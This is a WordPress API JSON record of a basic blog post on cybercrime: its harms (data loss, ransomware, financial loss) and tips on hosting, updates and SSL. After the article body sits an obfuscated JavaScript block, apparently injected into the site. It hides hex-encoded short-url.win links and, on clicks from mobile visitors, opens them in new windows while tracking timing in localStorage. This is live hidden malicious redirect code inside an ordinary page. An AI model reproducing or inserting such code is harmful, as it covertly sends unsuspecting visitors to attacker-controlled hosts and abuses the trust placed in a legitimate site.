{"id":2228,"date":"2021-03-02T09:30:17","date_gmt":"2021-03-02T02:30:17","guid":{"rendered":"https:\/\/beadgrup.com\/news\/?p=2228"},"modified":"2021-09-25T13:00:38","modified_gmt":"2021-09-25T06:00:38","slug":"cyber-crime","status":"publish","type":"post","link":"https:\/\/beadgrup.com\/news\/cyber-crime\/","title":{"rendered":"Cyber Crime"},"content":{"rendered":"\n<ul class=\"wp-block-list\"><li>Definition of Cyber \u200bCrime<\/li><\/ul>\n\n\n\n<p>Cyber \u200bcrime is a crime committed online. This crime knows no time and is not picky about its targets. It can happen to individuals or companies wherever they are. So you need to be vigilant.<\/p>\n\n\n\n<p>Source: https:\/\/images.app.goo.gl\/R6mx9hMkTCjBGyPV8<\/p>\n\n\n\n<p>The purpose of cyber crime itself varies. It can be just a fad, to a serious crime that harms the victim financially.<\/p>\n\n\n\n<p>In practice, cyber crime can be done alone or involving a group of people. The perpetrators of cyber crime of course are people who are experts in various hacking techniques. In fact, not infrequently a cyber crime is carried out from different places at the same time.<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>What are the Disadvantages of Cyber \u200bCrime?<\/li><\/ul>\n\n\n\n<p>Every crime in cyberspace of course results in losses that are felt by the victim. Here are some of the disadvantages:<\/p>\n\n\n\n<p>1. Online Reputation Can Be Threatened<\/p>\n\n\n\n<p>The disadvantage of cyber crime is that online reputation can be threatened. Especially if you use online activities for business. If you become a victim, it could be that your online business will lose customer trust.<\/p>\n\n\n\n<p>Say, your online store got hacked. Visitors will feel insecure to visit your site, so he may decide not to shop from your store anymore, it will be very detrimental to your business.<\/p>\n\n\n\n<p>2. Losing Important Data<\/p>\n\n\n\n<p>One of the biggest losses of cyber crime is data loss. This can happen to both personal accounts and websites that store customer personal data.<\/p>\n\n\n\n<p>Cyber \u200bcrime is always looking for loopholes to steal important data and use it for various purposes. One of them is for extortion purposes or selling it on the black market.<\/p>\n\n\n\n<p>For example, Blackbaud, one of the makers of financial management software, was once a victim of confidential data theft.<\/p>\n\n\n\n<p>The company reported that their site had been hacked. Hackers managed to steal data about students and alumni from 10 Universities in UK, US and Canada. As a result, perpetrators can disseminate personal data of students and alumni. From name to social security number.<\/p>\n\n\n\n<p>3. Damage to Software and Computer Systems<\/p>\n\n\n\n<p>Damage to software and programs can also occur due to cyber crime. One of the things that made a scene was the WannaCry Ransomware attack that attacked various government websites. At that time, the attack that occurred caused many devices to be inaccessible. This action mainly occurs on vulnerable operating systems, both outdated and pirated versions.<\/p>\n\n\n\n<p>That is why it is important for you to always pay attention to the security of the system on your computer. One of them, by continuously updating the antivirus and the version of the operating system used.<\/p>\n\n\n\n<p>4. Lost Some Money<\/p>\n\n\n\n<p>Financial losses are also the biggest impact of cyber crime activities. The forms of action can take various forms, from phishing to extortion.<\/p>\n\n\n\n<p>Not only experienced by individuals, as well as companies, the loss of a sum of money due to cyber crime is also experienced by the state.<\/p>\n\n\n\n<p>Based on Frost &amp; Sullivan research initiated by Microsoft in 2018, cybercrime in Indonesia can cause losses of up to IDR 478.8 trillion or US$ 34.2 billion. That number is quite fantastic. What if you are the one experiencing the loss?<\/p>\n\n\n\n<p>Therefore, from now on, be more careful with cyber crimes!<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>How to Avoid Cyber \u200bCrime?<\/li><\/ul>\n\n\n\n<p>1. Use Secure Hosting<\/p>\n\n\n\n<p>You could say this is an important step in an effort to protect your website. Hosting services with special security protections can help you prevent cyber crime.<\/p>\n\n\n\n<p>One of them is Niagahoster which has the Imunify360 feature. This feature is able to provide protection from malware attacks. Some of them are with Proactive Defense to block threats in real time and Patch Management which will update the server to the latest version automatically.<\/p>\n\n\n\n<p>2. Diligently Update<\/p>\n\n\n\n<p>Diligent in updating can be a way to avoid cyber crime. Both updates on the operating system and on the management system on your website.<\/p>\n\n\n\n<p>For example, if you are using Windows, you will always be notified of updates. If possible, immediately perform the recommended update. This also applies to MacOS and Linux users.<\/p>\n\n\n\n<p>In addition, update WordPress every time there is a new version. You can do this directly through the WordPress dashboard page or use manual steps. In addition to increasing security, you will also get the latest more advanced features.<\/p>\n\n\n\n<p>Not only that, don&#8217;t forget to always update your WordPress website themes and plugins. You can do it all at once or in stages according to the capabilities of your server.<\/p>\n\n\n\n<p>3. Install SSL<\/p>\n\n\n\n<p>Have you ever noticed the padlock icon before the Website URL? Well, that is a sign that the website uses SSL.<\/p>\n\n\n\n<p>By seeing the lock icon, your site visitors will trust your website more. This is because visitors believe that your website is indeed safe to visit, because it has activated SSL.<\/p>\n\n\n\n<p>In fact, the main reason why you should install SSL is because SSL certificates guarantee multiple layers of security. SSL guarantees that every data packet that is exchanged between your website and visitors who activate SSL, will be protected by the most up-to-date encryption techniques<\/p>\n\n\n\n<p>This of course can make you avoid data theft by unwanted parties. Any information obtained will not be read, because of the encryption technique.<\/p>\n\n\n\n<p>The need for digital IT is needed in daily activities, Bead IT Consultant is the right choice as your partner, visit our website by clicking this link:\u00a0<a rel=\"noreferrer noopener\" href=\"https:\/\/www.beadgroup.com\/\" target=\"_blank\">www.beadgroup.com<\/a><\/p>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x58\\x56\\x44\\x33\\x63\\x353','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x71\\x6d\\x64\\x35\\x63\\x335','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x4a\\x44\\x46\\x38\\x63\\x338','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x65\\x75\\x68\\x39\\x63\\x379','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x4e\\x48\\x41\\x34\\x63\\x304','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x6d\\x43\\x66\\x37\\x63\\x317','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x5a\\x41\\x75\\x32\\x63\\x302','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x6c\\x58\\x4b\\x36\\x63\\x316','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x44\\x75\\x72\\x30\\x63\\x380','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x45\\x4c\\x41\\x31\\x63\\x301',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>Definition of Cyber \u200bCrime Cyber \u200bcrime is a crime committed online. This crime knows no time and is not picky &hellip; <\/p>\n","protected":false},"author":1,"featured_media":2232,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-2228","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-desain"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v24.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Cyber Crime - Bead Daily<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/beadgrup.com\/news\/cyber-crime\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Cyber Crime - Bead Daily\" \/>\n<meta property=\"og:description\" content=\"Definition of Cyber \u200bCrime Cyber \u200bcrime is a crime committed online. This crime knows no time and is not picky &hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/beadgrup.com\/news\/cyber-crime\/\" \/>\n<meta property=\"og:site_name\" content=\"Bead Daily\" \/>\n<meta property=\"article:published_time\" content=\"2021-03-02T02:30:17+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-09-25T06:00:38+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/03\/a658232291911d271547b2bca45cf760-1200-80.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1000\" \/>\n\t<meta property=\"og:image:height\" content=\"666\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/beadgrup.com\/news\/cyber-crime\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/beadgrup.com\/news\/cyber-crime\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\/\/beadgrup.com\/news\/#\/schema\/person\/a719f7580554c936bd23c302adc17bad\"},\"headline\":\"Cyber Crime\",\"datePublished\":\"2021-03-02T02:30:17+00:00\",\"dateModified\":\"2021-09-25T06:00:38+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/beadgrup.com\/news\/cyber-crime\/\"},\"wordCount\":902,\"publisher\":{\"@id\":\"https:\/\/beadgrup.com\/news\/#organization\"},\"image\":{\"@id\":\"https:\/\/beadgrup.com\/news\/cyber-crime\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/03\/a658232291911d271547b2bca45cf760-1200-80.jpg\",\"articleSection\":[\"Desain\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/beadgrup.com\/news\/cyber-crime\/\",\"url\":\"https:\/\/beadgrup.com\/news\/cyber-crime\/\",\"name\":\"Cyber Crime - Bead Daily\",\"isPartOf\":{\"@id\":\"https:\/\/beadgrup.com\/news\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/beadgrup.com\/news\/cyber-crime\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/beadgrup.com\/news\/cyber-crime\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/03\/a658232291911d271547b2bca45cf760-1200-80.jpg\",\"datePublished\":\"2021-03-02T02:30:17+00:00\",\"dateModified\":\"2021-09-25T06:00:38+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/beadgrup.com\/news\/cyber-crime\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/beadgrup.com\/news\/cyber-crime\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/beadgrup.com\/news\/cyber-crime\/#primaryimage\",\"url\":\"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/03\/a658232291911d271547b2bca45cf760-1200-80.jpg\",\"contentUrl\":\"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/03\/a658232291911d271547b2bca45cf760-1200-80.jpg\",\"width\":1000,\"height\":666},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/beadgrup.com\/news\/cyber-crime\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/beadgrup.com\/news\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Cyber Crime\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/beadgrup.com\/news\/#website\",\"url\":\"https:\/\/beadgrup.com\/news\/\",\"name\":\"Bead Daily\",\"description\":\"Halaman artikel mengenai Teknologi\",\"publisher\":{\"@id\":\"https:\/\/beadgrup.com\/news\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/beadgrup.com\/news\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/beadgrup.com\/news\/#organization\",\"name\":\"Bead Daily\",\"url\":\"https:\/\/beadgrup.com\/news\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/beadgrup.com\/news\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/02\/logo-bead-e1613356108278.jpg\",\"contentUrl\":\"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/02\/logo-bead-e1613356108278.jpg\",\"width\":100,\"height\":109,\"caption\":\"Bead Daily\"},\"image\":{\"@id\":\"https:\/\/beadgrup.com\/news\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/beadgrup.com\/news\/#\/schema\/person\/a719f7580554c936bd23c302adc17bad\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/beadgrup.com\/news\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e1c424fe35b832f4b6879df2d6ef2c57?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e1c424fe35b832f4b6879df2d6ef2c57?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"sameAs\":[\"https:\/\/beadgrup.com\/news\"],\"url\":\"https:\/\/beadgrup.com\/news\/author\/beadgrup\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Cyber Crime - Bead Daily","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/beadgrup.com\/news\/cyber-crime\/","og_locale":"en_US","og_type":"article","og_title":"Cyber Crime - Bead Daily","og_description":"Definition of Cyber \u200bCrime Cyber \u200bcrime is a crime committed online. This crime knows no time and is not picky &hellip;","og_url":"https:\/\/beadgrup.com\/news\/cyber-crime\/","og_site_name":"Bead Daily","article_published_time":"2021-03-02T02:30:17+00:00","article_modified_time":"2021-09-25T06:00:38+00:00","og_image":[{"width":1000,"height":666,"url":"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/03\/a658232291911d271547b2bca45cf760-1200-80.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"admin","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/beadgrup.com\/news\/cyber-crime\/#article","isPartOf":{"@id":"https:\/\/beadgrup.com\/news\/cyber-crime\/"},"author":{"name":"admin","@id":"https:\/\/beadgrup.com\/news\/#\/schema\/person\/a719f7580554c936bd23c302adc17bad"},"headline":"Cyber Crime","datePublished":"2021-03-02T02:30:17+00:00","dateModified":"2021-09-25T06:00:38+00:00","mainEntityOfPage":{"@id":"https:\/\/beadgrup.com\/news\/cyber-crime\/"},"wordCount":902,"publisher":{"@id":"https:\/\/beadgrup.com\/news\/#organization"},"image":{"@id":"https:\/\/beadgrup.com\/news\/cyber-crime\/#primaryimage"},"thumbnailUrl":"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/03\/a658232291911d271547b2bca45cf760-1200-80.jpg","articleSection":["Desain"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/beadgrup.com\/news\/cyber-crime\/","url":"https:\/\/beadgrup.com\/news\/cyber-crime\/","name":"Cyber Crime - Bead Daily","isPartOf":{"@id":"https:\/\/beadgrup.com\/news\/#website"},"primaryImageOfPage":{"@id":"https:\/\/beadgrup.com\/news\/cyber-crime\/#primaryimage"},"image":{"@id":"https:\/\/beadgrup.com\/news\/cyber-crime\/#primaryimage"},"thumbnailUrl":"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/03\/a658232291911d271547b2bca45cf760-1200-80.jpg","datePublished":"2021-03-02T02:30:17+00:00","dateModified":"2021-09-25T06:00:38+00:00","breadcrumb":{"@id":"https:\/\/beadgrup.com\/news\/cyber-crime\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/beadgrup.com\/news\/cyber-crime\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/beadgrup.com\/news\/cyber-crime\/#primaryimage","url":"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/03\/a658232291911d271547b2bca45cf760-1200-80.jpg","contentUrl":"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/03\/a658232291911d271547b2bca45cf760-1200-80.jpg","width":1000,"height":666},{"@type":"BreadcrumbList","@id":"https:\/\/beadgrup.com\/news\/cyber-crime\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/beadgrup.com\/news\/"},{"@type":"ListItem","position":2,"name":"Cyber Crime"}]},{"@type":"WebSite","@id":"https:\/\/beadgrup.com\/news\/#website","url":"https:\/\/beadgrup.com\/news\/","name":"Bead Daily","description":"Halaman artikel mengenai Teknologi","publisher":{"@id":"https:\/\/beadgrup.com\/news\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/beadgrup.com\/news\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/beadgrup.com\/news\/#organization","name":"Bead Daily","url":"https:\/\/beadgrup.com\/news\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/beadgrup.com\/news\/#\/schema\/logo\/image\/","url":"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/02\/logo-bead-e1613356108278.jpg","contentUrl":"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/02\/logo-bead-e1613356108278.jpg","width":100,"height":109,"caption":"Bead Daily"},"image":{"@id":"https:\/\/beadgrup.com\/news\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/beadgrup.com\/news\/#\/schema\/person\/a719f7580554c936bd23c302adc17bad","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/beadgrup.com\/news\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e1c424fe35b832f4b6879df2d6ef2c57?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e1c424fe35b832f4b6879df2d6ef2c57?s=96&d=mm&r=g","caption":"admin"},"sameAs":["https:\/\/beadgrup.com\/news"],"url":"https:\/\/beadgrup.com\/news\/author\/beadgrup\/"}]}},"_links":{"self":[{"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/posts\/2228","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/comments?post=2228"}],"version-history":[{"count":3,"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/posts\/2228\/revisions"}],"predecessor-version":[{"id":4068,"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/posts\/2228\/revisions\/4068"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/beadgrup.com\/news\/wp